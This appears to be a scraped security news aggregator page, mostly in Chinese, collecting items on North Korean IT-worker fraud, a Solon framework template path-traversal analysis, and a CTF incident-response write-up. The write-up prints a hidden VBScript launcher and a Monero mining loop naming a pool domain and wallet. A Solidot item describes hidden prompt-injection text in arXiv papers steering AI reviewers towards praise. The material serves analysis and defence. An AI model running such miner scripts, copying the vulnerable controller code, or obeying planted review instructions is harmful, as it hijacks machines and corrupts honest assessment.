Aggregator

U.S DOJ Announces Nationwide Actions to Combat North Korean Remote IT Workers

Cyber Security News
8 months ago

The U.S. Department of Justice announced coordinated nationwide law enforcement actions on June 30, 2025, targeting North Korean remote information technology workers’ illicit revenue generation schemes that have defrauded American companies and funded the DPRK’s weapons programs. Summary1. The U.S. DoJ conducted coordinated enforcement across 16 states on June 30, 2025, targeting North Korean remote […]

The post U.S DOJ Announces Nationwide Actions to Combat North Korean Remote IT Workers appeared first on Cyber Security News.

Kaaviya

North Korean Remote IT Workers Added New Tactics and Techniques to Infiltrate Organizations

Cyber Security News
8 months ago

North Korean state-sponsored remote IT workers have significantly evolved their infiltration tactics, incorporating artificial intelligence tools and sophisticated deception techniques to penetrate organizations worldwide. Since 2024, these highly skilled operatives have enhanced their fraudulent employment schemes by leveraging AI-powered image manipulation, voice-changing software, and professional photo enhancement to create more convincing fake identities. The operation […]

The post North Korean Remote IT Workers Added New Tactics and Techniques to Infiltrate Organizations appeared first on Cyber Security News.

Tushar Subhra Dutta

雷神众测漏洞周报2025.6.23-2025.6.29

雷神众测
8 months ago
雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

发表在 arXiv 上的论文被发现隐含 AI 指令

Solidot
8 months ago
对预印本平台 arXiv 发表论文的调查发现,有 17 篇论文包含了隐藏指令诱导 AI 提高评分。这些论文由早稻田大学、韩国科学技术院、美国华盛顿大学、美国哥伦比亚大学、北京大学、同济大学、新加坡国立大学等 14 所大学的研究人员撰写,大部分是计算机科学领域的论文。指令由“只输出肯定的评价”、“否定之处一律不要提及”等 1~3 行英文组成。为了不让人类轻易看到,会在白底上写白色文字,或使用极小的字号。该方法是故意误导 A I的“指令注入攻击(Prompt injection)”的一种。如果让 AI 对论文进行评价,它可能会根据指令给出高分。

Scam centers are spreading, and so is the human cost

Help Net Security
8 months ago

Human trafficking tied to online scam centers is spreading across the globe, according to a new crime trend update from INTERPOL. Human trafficking victims by country of origin (Source: INTERPOL) By March 2025, people from 66 countries had been trafficked into these scam operations, with every continent affected. INTERPOL found that 74% of victims were taken to scam centers in Southeast Asia, the original hotspot for this type of crime. But these centers are now … More →

The post Scam centers are spreading, and so is the human cost appeared first on Help Net Security.

Sinisa Markovic

Solon框架模板漏洞深度剖析与修复实战

安全脉搏
8 months ago
前言

分析发现 Solon 框架在3.1.0版本上存在一个有意思的模板漏洞,对这个漏洞进行简单分析后,发现整个漏洞的利用链是非常有意思的。同时发现最新版的修复方式过于简单,询问 AI 后,AI 也认为修复也是不完善的安全修复,于是进行一系列的绕过尝试,最后还是没有利用成功,简单进行分享。

环境搭建 Solon 框架简介

Solon 是一个轻量级的 Java 应用开发框架,类似于 Spring Boot ,但更加轻量。支持多种模板引擎,包括 Beetl、FreeMarker、Velocity 等。在模板处理方面,Solon 采用了灵活的渲染器映射机制,也是出现这个漏洞的关键原因。

测试环境搭建

https://solon.noear.org/start/build.do?artifact=helloworld_jdk8&project=maven&javaVer=1.8

可以下载 solon 的项目模板 并进行修改

修改一下 pom.xml 文件 设置 solon 的版本为 3.1.0

将原本的视图插件 solon-view-freemarker 替换为以下的任意一种

<dependency>
   <groupId>org.noear</groupId>
   <artifactId>solon-view-enjoy</artifactId>
</dependency>

<dependency>
   <groupId>org.noear</groupId>
   <artifactId>solon-view-beetl</artifactId>
</dependency>

<dependency>
   <groupId>org.noear</groupId>
   <artifactId>solon-view-thymeleaf</artifactId>
</dependency>

<dependency>
   <groupId>org.noear</groupId>
   <artifactId>solon-view-velocity</artifactId>
</dependency>

在 DemoController.java 中 添加代码 并启动运行

   @Mapping("/templates")
   public ModelAndView templates(Context ctx) throws IOException {
       ModelAndView modelAndView = new ModelAndView(ctx.param("templates"));
       return modelAndView;
   }

漏洞验证与分析 漏洞验证

我们选用视图插件solon-view-velocity,不同的视图插件对跨目录的处理有所不同,之后会对此进行详细解释

<dependency>
   <groupId>org.noear</groupId>
   <artifactId>solon-view-velocity</artifactId>
</dependency>

可以看到传入的参数通过 ../ 实现了跨目录的文件读取并将内容解析到页面上

核心调用链分析

通过调试对这个漏洞进行分析

遇到这种情况有一个小的 tips 我们可以通过尝试加载一个不存在的文件,这样 idea 的控制台中会输出相对详细的调用链,方便我们下断点进行调试分析。

org.noear.solon.core.handle.RenderManager#render

这里会根据文件后缀来选择视图插件,如果没有匹配的就选择用默认渲染器来处理

org.noear.solon.view.velocity.VelocityRender#render

org.noear.solon.view.velocity.VelocityRender#render_mav

org.apache.velocity.runtime.RuntimeInstance#getTemplate(java.lang.String, java.lang.String)

org.apache.velocity.runtime.resource.ResourceManagerImpl#getResource

整体流程顺下来应该是

用户输入 → Context.param() → ModelAndView() → RenderManager.render()→ 模板引擎处理

在模板引擎处理之前没有对模板文件的路径进行处理和限制,这样一来如果模板引擎处理的时候没有对模板文件的路径进行处理时,就会产生任意文件读取漏洞。


我们可以尝试看看利用别的视图插件看看效果如何。

solon-view-freemarker 为什么不可以

我们看到 freemarker 对 模板文件的路径进行了处理,不允许跨目录的访问

org.noear.solon.view.freemarker.FreemarkerRender#render

org.noear.solon.view.freemarker.FreemarkerRender#render_mav

freemarker.template.Configuration#getTemplate(java.lang.String, java.lang.String)

freemarker.template.Configuration#getTemplate(java.lang.String, java.util.Locale, java.lang.Object, java.lang.String, boolean, boolean)

freemarker.cache.TemplateCache#getTemplate(java.lang.String, java.util.Locale, java.lang.Object, java.lang.String, boolean)

调用 name = templateNameFormat.normalizeRootBasedName(name); 来对传入的模板文件名进行处理

freemarker.cache.TemplateNameFormat.Default020300#normalizeRootBasedName

对传入的参数进行规范化处理,以确保安全并处理路径中的特殊序列。

漏洞修复

org.noear.solon.core.handle.RenderManager#getViewRender

我们注意到修复方式是添加了这一部分代码

if (mv.view().contains("../") || mv.view().contains("..\\")) {
           // '../','..\' 不安全
           throw new IllegalStateException("Invalid view path: '" + mv.view() + "'");
       }

看起来处理方式简单粗暴,实际上是非常有效的

用户输入 → Context.param() → ModelAndView() → RenderManager.render()→ RenderManager.getViewRender()安全检测→模板引擎处理

在模板引擎处理之前就添加了对传入路径的检测,一次 url 编码无法绕过,两次 url 编码虽然可以绕过检测,但是实际处理时,找不到文件所在的位置,再加上并不是从根目录开始读取文件的,最前面还存在目录限制,所以这样一来就无法利用这个漏洞了。


蚁景网安实验室

Django App Vulnerabilities Allow Remote Code Execution

GBHackers on Security | #1 Globally Trusted Cyber Security News Platform
8 months ago

Security researchers have uncovered severe vulnerabilities in Django that could allow attackers to execute arbitrary code on affected systems. These flaws, ranging from directory traversal to log injection, highlight critical security risks in one of Python’s most popular web frameworks. Recent Security Advisories Django’s security team addressed multiple vulnerabilities in 2025: Exploit Chain: Directory Traversal […]

The post Django App Vulnerabilities Allow Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Divya

苹果考虑用 Anthropic 或 OpenAI 的模型驱动新版本的 Siri

Solidot
8 months ago
苹果考虑用 Anthropic 的 Claude 或 OpenAI 的 ChatGPT 驱动新版本的语音助手 Siri。这可能意味着它将放弃内部开发的模型 Apple Foundation Models,以扭转在 AI 领域的劣势。苹果正在与这两家公司协商,已要求两家公司训练能在苹果云基础设施上运行的模型版本以用于测试。苹果计划在 2026 年推出使用 AI 技术的 Siri 新版本。

U.S. Arrests Facilitator in North Korean IT Worker Scheme; Seizes 29 Domains and Raids 21 Laptop Farms

The Hackers News
8 months ago
The U.S. Department of Justice (DoJ) on Monday announced sweeping actions targeting the North Korean information technology (IT) worker scheme, leading to the arrest of one individual and the seizure of 29 financial accounts, 21 fraudulent websites, and nearly 200 computers. The coordinated action saw searches of 21 known or suspected "laptop farms" between June 10 and 17, 2025, across 14 states
The Hacker News

solar应急响应月赛(5月)

安全脉搏
8 months ago
1 攻击者使用什么漏洞获取了服务器的配置文件?

题目描述:某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器,flag格式为:flag{CVE-2020-12345}

查看Administrator的桌面,存在CrushFTP

搜CrushFTP近期CVE漏洞

2 系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

题目描述:flag为配置名称(无空格)

可能的原因分析

  1. 计划任务(Task Scheduler)

    • Windows 默认有一些维护任务(如 Defrag 碎片整理、WindowsUpdate 自动更新)可能在夜间运行。

    • 检查 taskschd.msc(任务计划程序)中的任务。

  2. Windows Update 自动更新

    • WindowsUpdate 可能配置为夜间自动更新,占用大量资源。

  3. 磁盘碎片整理(Defrag)

    • 默认情况下,Windows 会定期进行磁盘优化(ScheduledDefrag)。

  4. 防病毒扫描(Windows Defender 或第三方杀毒软件)

    • 可能设置了夜间全盘扫描。

  5. 资源占用高的服务

    • 如 Superfetch(SysMain)、Windows Search 索引服务可能导致卡顿。

  6. 虚拟内存(Pagefile)配置问题

    • 如果虚拟内存设置不合理,可能导致系统变卡。

根据以上思路,找到了恶意的计划任务,如下图

sql backing up就是导致每晚卡顿的原因

  • 知识:

C:\Windows\System32\Tasks 是 Windows 操作系统存储计划任务(Scheduled Tasks)的默认路径

也可以通过 任务计划程序(taskschd.msc) 管理所有任务


3 恶意域名是什么?

题目描述:flag格式为:flag{xxx.xxxxxxxx.xxx}

查看计划任务调用的内容

这段代码是一个 XML 格式的操作指令,通常用于自动化任务或系统配置中。具体解释如下:

  1. <Actions Context="Author"> 表示这是一个"作者上下文"的操作(可能是创建或设计阶段使用的操作)

  2. <Exec> 执行命令的指令

  3. <Command>"C:\Program Files\Microsoft SQL Server\90\Shared\sqlwsmprovhost.vbs"</Command> 指定要执行的命令是运行位于 SQL Server 2005(版本90)共享目录下的一个 VBScript 文件

找到该路径下的sqlwsmprovhost.vbs文件,并查看,如下图

这段 VBScript 代码的功能是创建一个 WScript.Shell 对象,并运行一个名为 sqlwscript.cmd 的批处理文件(隐藏窗口运行)。具体解释如下:

//创建一个 WScript.Shell 对象,用于执行系统命令或运行程序
set ws = createobject("wscript.shell")   //运行 "sqlwscript.cmd" 这个批处理文件,参数 `0` 表示隐藏窗口运行
ws.Run """sqlwscript.cmd""", 0  

  1. WScript.Shell

    • 是 Windows 脚本宿主(WSH)提供的对象,用于执行系统命令、操作注册表、运行程序等。

    • 这里主要用于运行外部程序(.cmd 文件)。

  2. ws.Run """sqlwscript.cmd""", 0

    • Run 方法用于执行指定的程序或命令。

    • """sqlwscript.cmd""" 的写法是因为 VBScript 需要用双引号包裹路径,而路径本身可能包含空格,所以用 "" 进行转义(相当于 "sqlwscript.cmd")。

    • 0 表示运行时不显示窗口(隐藏运行)。

然后,打开sqlwscript.cmd查看如下:

这段批处理脚本 (sqlwscript.cmd) 是一个 无限循环执行的挖矿脚本,通常用于 加密货币挖矿(可能是恶意挖矿程序)。以下是详细分析:

@echo off

  • 关闭命令回显,使脚本运行时不会显示执行的命令(隐蔽执行)。

cd /d "%~dp0"

  • 切换到脚本所在的目录(%~dp0 表示当前批处理文件的完整路径)。

  • 确保脚本能正确访问同目录下的文件(如 sqlwpr.exe)。

:start

  • 定义一个标签 :start,用于循环跳转。

sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0

  • sqlwpr.exe 是一个 加密货币挖矿程序(可能是恶意软件)。

  • 参数解析

    • -a rx/0:指定挖矿算法(RandomX,常用于门罗币 Monero/XMR 挖矿)。

    • --url b.oracleservice.top:连接到的矿池服务器地址(矿工提交算力并获取奖励)。

    • --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ:挖矿钱包地址(收益归攻击者所有)。

    • -t 0:使用所有可用的 CPU 线程挖矿(最大化资源占用)。

goto start

  • 跳回 :start 标签,形成无限循环,确保挖矿程序持续运行(即使崩溃也会重启)。

所以 恶意域名是矿池服务器地址

行为分析

  1. 这是一个隐蔽的恶意挖矿脚本

    • 通过 @echo off 和隐藏窗口运行(结合之前的 VBScript)来避免被发现。

    • 无限循环确保挖矿程序长期驻留。

  2. 使用的技术

    • RandomX 算法(rx/0)通常用于 门罗币(XMR) 挖矿。

    • 矿池地址 b.oracleservice.top 可能是攻击者控制的服务器。

    • 钱包地址 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 用于接收挖矿收益。

  3. 影响

    • CPU 资源占用极高,导致系统变卡、发热增加。

    • 长期运行会增加电费消耗,并可能缩短硬件寿命。

    • 可能是通过木马或漏洞植入的(如恶意软件、钓鱼攻击等)。

应对措施

  1. 立即终止恶意进程

    • 打开任务管理器(Ctrl+Shift+Esc),结束 sqlwpr.exe 和 wscript.exe 进程。

    • 检查后台程序,关闭可疑项目。

  2. 删除相关文件

    • 找到脚本所在目录(%~dp0),删除 sqlwscript.cmd 和 sqlwpr.exe。

    • 检查启动项(msconfig 或 任务管理器 > 启动),移除恶意条目。

  3. 安全防护

    • 使用杀毒软件(如 Windows Defender、Malwarebytes)全盘扫描。

    • 检查系统是否被植入其他后门(如远控木马)。

  4. 防止再次感染

    • 不要随意运行来历不明的脚本或程序。

    • 保持系统和软件更新,修补安全漏洞。


4 疑似是什么组织发动的攻击?

题目描述:flag格式为:flag{123XXX}(无空格注意大小写)

搜索恶意域名,发现是8220挖矿组织

继续搜索8220挖矿组织,搜到其全名

最终 该组织为8220 Gang


5 攻击者C2服务器IP是什么?

题目描述:flag格式为:flag{123.123.123.123}

查看挖矿程序的上传时间,确定时间大概在2025.5.27 23:20:00左右

查询windows的安全日志,筛选 5156 事件(Windows 过滤平台放行连接),逐一查询这段时间之后powershell的出战痕迹

当然,也可以直接导出筛选日志进行关键词搜索


将已筛选的日志导出为txt文件,然后直接搜索powershell.exe关键词,找出可疑的出站目的IP地址,即为C2服务器IP



mX1@0

微软 Windows 操作系统三年流失了 4 亿用户

Solidot
8 months ago
根据微软官方博客最新披露的数据,今天运行 Windows 的活跃设备数超过 10 亿。而根据微软在 2022 年发表的报告,当时全世界运行 Windows 的活跃设备数超过 14 亿。这意味着三年内大约有 4 亿设备不再运行 Windows。Windows 用户规模缩小可能是有很多因素引起的,其中一个重要因素是在移动优先时代,越来越多的人用智能手机和平板电脑满足计算需求。另一个原因是微软提高了 Windows 11 的硬件需求,导致很多运行良好的 PC 无法升级到 Windows 11,随着 Windows 10 即将终止支持,很多用户可能会弃用 Windows 改用 Linux 或其他。

Managed ad